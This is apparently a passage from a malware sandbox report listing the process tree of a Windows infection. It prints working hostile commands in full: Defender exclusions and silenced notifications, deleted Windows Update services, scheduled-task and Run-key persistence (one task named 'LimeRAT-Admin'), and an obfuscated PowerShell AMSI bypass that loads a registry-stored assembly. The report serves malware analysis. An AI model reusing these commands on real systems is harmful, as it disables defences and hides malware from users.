        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbgBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAaAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAbABsACMAPgA="
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4656
      - C:\Users\Admin\AppData\Local\Temp\update.exe
        
        "C:\Users\Admin\AppData\Local\Temp\update.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4684
      - C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        6⤵
        Executes dropped EXE
        
        PID:4820
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\Microsoft\Edge\Application\Microsoft Edge\Microsoft Edge.exe'"
        7⤵
        Creates scheduled task(s)
        
        PID:4748
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:776
        
        C:\Users\Admin\Microsoft\Edge\Application\Microsoft Edge\Microsoft Edge.exe
        
        "C:\Users\Admin\Microsoft\Edge\Application\Microsoft Edge\Microsoft Edge.exe"
        7⤵
        Executes dropped EXE
        
        PID:3932
      - C:\Users\Admin\AppData\Local\Temp\XEPHER SCRIPT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XEPHER SCRIPT.exe"
        6⤵
        Executes dropped EXE
        Drops desktop.ini file(s)
        Suspicious use of SetWindowsHookEx
        
        PID:832
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:1428
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:2796
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "SummaryNotificationDisabled" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:2140
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "NoActionNotificationDisabled" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:1852
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "FilesBlockedNotificationDisabled" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:2104
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:4616
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "& {Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $notify = New-Object System.Windows.Forms.NotifyIcon; $notify.Icon = [System.Drawing.SystemIcons]::Information; $notify.Visible = $true; $notify.ShowBalloonTip(0, 'XEPHERSCRIPT', 'LATEST VERSION DOWNLOADED.', [System.Windows.Forms.ToolTipIcon]::None)}"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4996
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1732
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4696
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2104
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3484
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4376
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3564
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1212
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:3152
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:4168
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4208
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:776
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1708
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2364
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4616
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3712
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4468
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbshdfh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1704
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:1120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#aepqzgcx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4608
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:1552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1408
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:5112
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3808
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4724
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3780
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4020
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4728
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3140
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1852
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:2388
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:1052
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4688
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbshdfh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4356
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1048
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4444
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:4720
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:1364
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:3156
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe fgaocnskukkf
  2⤵
  PID:3160
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    3⤵
    - Drops file in Program Files directory
    PID:1428
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:4404
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    PID:4428
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe kjpyiayxdvgutqdm 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzk2eWYjwKK+fEWG7iUzJYUGYWt/uXq0L5q1ZNkgmr1/j91tEt+Do0WPWZE9vv1ws2Nq0tzXuwM/8t3/MzIyUfiCEOfW2dmYMJleOersijbUIIVkTDpMVO7OlPs8EwJRwXu66ASwbMEVwf9LeWLBpDoqHBDXDSsoWRvYPR/6A/nbHGELSCi65rLznJIkoxSjU1Mc6VhTd5fVr7KmnJUb6PsqpaJJ67nDPBgPZqfsfScX5iwgN3pElRNiFDbpna0V44SIepnMAu+FnXDB2jw/MJq4R0+aU+ubRLEcfUpb7aABAekeb4eKjfCXgFGcYj93Me7dKTxP2Z7LNOKGYZGZLZnw4HG1DUn4S6IAYH892pH+O7/9w0u73w65zpFWSGwfqoIrWCv/H8TodWFkltC8boYappihzmT2FNBiInQ2e+zsrH4rwIAak4q94ZBbfeIh1K4tBIzAK9IlEZrvHsq2ht+FHaNby8v/bK9WQBu19gGsE6xwPN2sN6cnfqIeccSyWj6Bl0+LBtE37Zr7Ey1N/flboaxYX+JJvbQWKeTExr+2ypaGv023LvU3D6JnY5P6cg
  2⤵
  - Modifies data under HKEY_USERS
  PID:4004

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2732

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2672

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2632

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2600

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2592

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2576

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2464

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:2420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2368

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2348

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2144

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1592

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1788

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1688

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1480

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1396

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1292

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1200

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1148

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:828
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:DHeqtvoPvIfV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$evmJqGweiRrjGi,[Parameter(Position=1)][Type]$FuJEygRpKy)$cbcFxwFOCZN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+'e'+''+[Char](99)+''+'t'+''+[Char](101)+'d'+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+''+'m'+''+[Char](111)+'r'+[Char](121)+''+'M'+''+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+'s'+[Char](105)+'C'+'l'+''+[Char](97)+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$cbcFxwFOCZN.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+'am'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$evmJqGweiRrjGi).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+'g'+'e'+''+[Char](100)+'');$cbcFxwFOCZN.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+'ke',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+''+'H'+'i'+'d'+''+[Char](101)+''+[Char](66)+'yS'+'i'+'g'+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+'Sl'+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+'',$FuJEygRpKy,$evmJqGweiRrjGi).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $cbcFxwFOCZN.CreateType();}$pGjjMYhndaFYw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+'o'+'s'+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+''+'i'+''+'n'+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+'n'+'s'+'a'+[Char](102)+'e'+[Char](112)+''+[Char](71)+'j'+[Char](106)+''+[Char](77)+'Y'+'h'+'n'+[Char](100)+''+[Char](97)+''+'F'+'Y'+[Char](119)+'');$ucUAYeyAqIuDzi=$pGjjMYhndaFYw.GetMethod(''+[Char](117)+''+[Char](99)+'U'+[Char](65)+'Y'+[Char](101)+''+[Char](121)+''+[Char](65)+''+'q'+''+'I'+''+[Char](117)+''+[Char](68)+''+[Char](122)+''+'i'+'',[Reflection.BindingFlags]'P'+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c,S'+[Char](116)+'a'+[Char](116)+'ic',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hmQvoWIRtoewDhRSTBS=DHeqtvoPvIfV @([String])([IntPtr]);$suxDzgfLsVioamfaTSnQjJ=DHeqtvoPvIfV @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ECJFCFACmIA=$pGjjMYhndaFYw.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+'du'+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+'rn'+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+'l'+'l'+'')));$NBQIyPsKoEUsTm=$ucUAYeyAqIuDzi.Invoke($Null,@([Object]$ECJFCFACmIA,[Object]('Lo'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'ra'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$IkussNPQeJFAGlMea=$ucUAYeyAqIuDzi.Invoke($Null,@([Object]$ECJFCFACmIA,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$pBvRROX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NBQIyPsKoEUsTm,$hmQvoWIRtoewDhRSTBS).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+'d'+'l'+''+[Char](108)+'');$aqqdiMtQgKPSLpCSF=$ucUAYeyAqIuDzi.Invoke($Null,@([Object]$pBvRROX,[Object](''+[Char](65)+'m'+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$xOuucNkryh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IkussNPQeJFAGlMea,$suxDzgfLsVioamfaTSnQjJ).Invoke($aqqdiMtQgKPSLpCSF,[uint32]8,4,[ref]$xOuucNkryh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$aqqdiMtQgKPSLpCSF,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IkussNPQeJFAGlMea,$suxDzgfLsVioamfaTSnQjJ).Invoke($aqqdiMtQgKPSLpCSF,[uint32]8,0x20,[ref]$xOuucNkryh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+''+'a'+'l'+[Char](101)+'rs'+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4824
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:udOBTbOhqeQv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CLnGielHWSgLIk,[Parameter(Position=1)][Type]$YoOBiTvogo)$lvIuLrcJdKD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+''+[Char](108)+'e'+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+'D'+[Char](101)+'l'+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+'r'+'yM'+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'Del'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e'+'T'+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+','+[Char](80)+'u'+[Char](98)+''+'l'+''+'i'+''+'c'+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+''+'d'+','+'A'+'n'+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$lvIuLrcJdKD.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+'p'+'e'+[Char](99)+'i'+[Char](97)+'l'+'N'+'a'+[Char](109)+'e'+','+''+'H'+'i'+[Char](100)+'e'+'B'+''+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+'P'+'ub'+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$CLnGielHWSgLIk).SetImplementationFlags('R'+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+''+'d'+'');$lvIuLrcJdKD.DefineMethod('I'+'n'+'vo'+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'ew'+[Char](83)+'l'+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$YoOBiTvogo,$CLnGielHWSgLIk).SetImplementationFlags(''+'R'+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $lvIuLrcJdKD.CreateType();}$vCPjiNcBLLbRt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 